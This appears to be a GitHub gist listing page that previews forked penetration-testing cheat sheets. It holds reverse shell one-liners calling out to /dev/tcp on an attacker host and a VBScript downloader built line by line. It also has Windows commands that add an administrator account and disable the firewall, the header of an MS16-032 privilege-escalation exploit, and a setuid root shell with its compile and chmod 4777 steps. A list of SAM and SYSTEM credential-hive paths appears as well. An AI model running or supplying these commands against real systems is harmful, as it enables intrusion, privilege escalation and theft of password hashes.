prachauthit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
| echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
| echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
| echo Err.Clear >> wget.vbs | |
| echo Set http = Nothing >> wget.vbs | |
| echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #get a pty through python | |
| python -c 'import pty; pty.spawn("/bin/bash");' | |
| #grab the user agent from the http header on port 10443 | |
| tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
| #base64 decode a string | |
| echo STRINGTODECODE | base64 --decode | |
| #escape jail shell |
prachauthit
/ ssh_tricks
Created
January 18, 2017 00:11
— forked from sckalath/ssh_tricks
ssh kung fu
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##SOCKS Proxy## | |
| #Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
| #Command line: | |
| ssh -D 127.0.0.1:1080 10.0.0.1 | |
| #~/.ssh/config: | |
| Host 10.0.0.1 | |
| DynamicForward 127.0.0.1:1080 | |
| #You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
prachauthit
/ reverse_shells
Created
January 18, 2017 00:12
— forked from sckalath/reverse_shells
Reverse shells
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 | |
| 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
| #bash alt 3 |
prachauthit
/ windows_crap
Created
January 18, 2017 00:12
— forked from sckalath/windows_crap
windows crap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #add a user | |
| net user ryan mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add ryan | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
prachauthit
/ MS16-032.ps1
Created
January 19, 2017 02:34
— forked from benichmt1/MS16-032.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
| operating systems that support PowerShell v2+. Credit for the discovery of | |
| the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
| Modifications by Mike Benich (@benichmt1). | |
| Targets: |
prachauthit
/ sh.c
Created
January 20, 2017 05:22
— forked from anonymous/sh.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| int main() | |
| { | |
| setuid(0); | |
| setgid(0); | |
| system("/bin/sh"); | |
| } |
prachauthit
/ sh.sh
Created
January 20, 2017 05:22
— forked from anonymous/sh.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gcc sh.c -o shell | |
| chmod +x shell | |
| chmod 4777 shell |
prachauthit
/ windows_blind
Created
July 3, 2017 08:54
— forked from sckalath/windows_blind
Windows Blind Files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |
prachauthit
/ invokeAllChecks.vbs
Created
July 3, 2017 08:55
— forked from ImAnEnabler/invokeAllChecks.vbs
VBscript implementation of the Invoke-AllChecks function of PowerUp using WMI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '-' | |
| '-' invokeAllChecks.vbs | |
| '-' | |
| '-' VBscript implementation of the Invoke-AllChecks function of PowerUp developed by @harmj0y | |
| '-' by: @ImAnEnabler | |
| '-' | |
| '-' In the environment I work, sc.exe is not allowed for non-admins, so I used WMI instead. | |
| '-' Save the vbs file and run with cscript: | |
| '-' cscript //nologo invokeAllChecks.vbs |
OlderNewer